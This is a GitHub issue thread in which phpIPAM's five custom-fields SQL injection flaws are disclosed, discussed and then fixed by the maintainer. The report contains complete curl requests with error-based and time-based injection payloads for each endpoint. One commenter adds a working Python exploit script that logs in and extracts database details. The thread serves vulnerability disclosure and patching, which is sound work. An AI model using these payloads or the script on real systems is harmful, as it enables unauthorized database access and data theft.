Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Five sql injections on All Phpipam Versions. #2738

Closed
2ndGeorge opened this issue Sep 16, 2019 · 6 comments
Closed

Five sql injections on All Phpipam Versions. #2738

2ndGeorge opened this issue Sep 16, 2019 · 6 comments

Comments

@2ndGeorge
Copy link

2ndGeorge commented Sep 16, 2019

Describe the bug
Five sql injections on All phpipam Versions.The vulnerable files are /app/admin/custom-fields/edit.php,/app/admin/custom-fields/edit-result.php,/app/admin/custom-fields/filter.php,/app/admin/custom-fields/filter-result.php,/app/admin/custom-fields/order.php

phpIPAM version
All phpipam Versions.

vulnerability 1
req:
curl 'http://testipam.com/app/admin/custom-fields/edit.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure

We can find user()root@172.21.0.3 info in response content.

rsp:

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':root@172.21.0.3'

vulnerability 2
req:
curl 'http://testipam.com/app/admin/custom-fields/edit-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`&csrf_cookie=ylbgj5gvd5OFeTeVPMQVgCaD8zxMro1R&name=asdfadsf' --compressed --insecure
rsp:
The time of response is more than 10s.

vulnerability 3
req:
curl 'http://testipam.com/app/admin/custom-fields/filter.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
rsp:

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':root@172.21.0.3'

vulnerability 4
req:
curl 'http://testipam.com/app/admin/custom-fields/filter-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
rsp

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':root@172.21.0.3'
Filter saved

vulnerability 5
req:
curl 'http://testipam.com/app/admin/custom-fields/order.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`&current=1&next=3' --compressed --insecure

@GaryAllan
Copy link
Collaborator

Hi @2ndGeorge

https://www.php.net/manual/en/pdo.quote.php
PDO::quote() places quotes around the input string (if required) and escapes special characters

I think these issues have the same root cause. PDO->quote() isn't behaving as documented and escaping special characters in table names (at least on the machines I've tested), using bound parameters doesn't work for table names.

I may just whitelist table names in queries and drop PDO->quote() completely to be safe.

Non-trivial issue and fix.... may take a few days.

@GaryAllan
Copy link
Collaborator

Hello @2ndGeorge
I've pushed a fix to the master branch. Are you able to re-test?

@kkirsche
Copy link

@GaryAllan the changes you've made remediate it in the exploit code I have put together. As this is in the docker versions of the application, the patches were easy to test.

#!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
#   Python 3
#   requests package

# For more details, view:
# https://github.com/phpipam/phpipam/issues/2738

# Example Output
# [+] Executing select user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select system_user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu


from requests import Session

host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"

credentials = {
    "ipamusername": "Admin",
    "ipampassword": "Password",
}

payload = {
    "action": "add",
    "table": "",
}


cmds = {
    "unpriv": [
        "select user()",
        "select system_user()",
        "select @@version",
        "select @@datadir",
        "select @@hostname",
    ]
}

if __name__ == "__main__":
    client = Session()
    resp = client.post(login_url, data=credentials)
    if resp.status_code == 200:
        for cmd in cmds["unpriv"]:
            print(f"[+] Executing {cmd}")
            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
            resp = client.post(exploit_url, data=payload)
            info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
            print(f"[*] Received: {info}")

@GaryAllan
Copy link
Collaborator

Thanks

@peawet08
Copy link

Hi,

I'm running 1.4. Is there a particular file I can download to remediate this or will I have to wait for the next release?

Thanks

@GaryAllan
Copy link
Collaborator

Hello @peawet08

Fixes have been applied to the 1.3, 1.4 and master branches.

To download the 1.4 git branch

git clone --recursive -b 1.4 https://github.com/phpipam/phpipam/

or

git clone -b 1.4 https://github.com/phpipam/phpipam/
cd phpipam
git submodule update --init --recursive

`

To update existing 1.4 branch
cd phpipam
git pull
git submodule update --init --recursive

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

4 participants